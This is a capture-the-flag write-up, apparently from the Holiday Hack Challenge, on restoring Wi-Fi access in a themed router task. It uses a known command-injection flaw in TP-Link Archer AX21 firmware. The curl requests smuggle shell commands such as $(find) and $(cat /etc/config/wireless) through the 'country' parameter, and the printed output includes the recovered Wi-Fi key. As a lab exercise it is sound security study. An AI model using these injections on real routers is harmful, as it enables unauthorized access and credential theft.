Oi! I’m JJ - love rock, metal, and punk, and yeah, I take BTC. Skeletor’s my hero, no shame there.
Those bloody gnomes have wrecked the neighborhood’s Wi-Fi - changed the admin password, messed up all the settings, the whole lot. Now I can’t even get online!
We own this router, so we’re just taking back what’s ours.
Task: Hack past the gnomes’ chaos and restore access to the Wi-Fi network.
First we access the router's web console https://dosis-network-down.holidayhackchallenge.com/ and note the version information:
Firmware Version:
1.1.4 Build 20230219 rel.69802
Hardware Version:
Archer AX21 v2.0
A quick look into the exploit DB shows there might be a working exploit for that given firmware, see https://www.exploit-db.com/exploits/51677
Instead of using the pre-built exploit, which requires a reverse shell, we build the same request in curl:
curl --get 'https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale' --data-urlencode 'form=country' --data-urlencode 'operation=write' --data-urlencode 'country=$(find)' -i -s
...
./etc/config
./etc/config/dhcp
./etc/config/firewall
./etc/config/leds
./etc/config/network
./etc/config/system
./etc/config/wireless
...
We look at some of the config files until we find the right one, and immediately we have the WiFi password:
curl --get 'https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale' --data-urlencode 'form=country' --data-urlencode 'operation=write' --data-urlencode 'country=$(cat /etc/config/wireless)' -i -s
...
config wifi-iface 'default_radio0'
option device 'radio0'
option network 'lan'
option mode 'ap'
option ssid 'DOSIS-247_2.4G'
option encryption 'psk2'
option key 'SprinklesAndPackets2025!'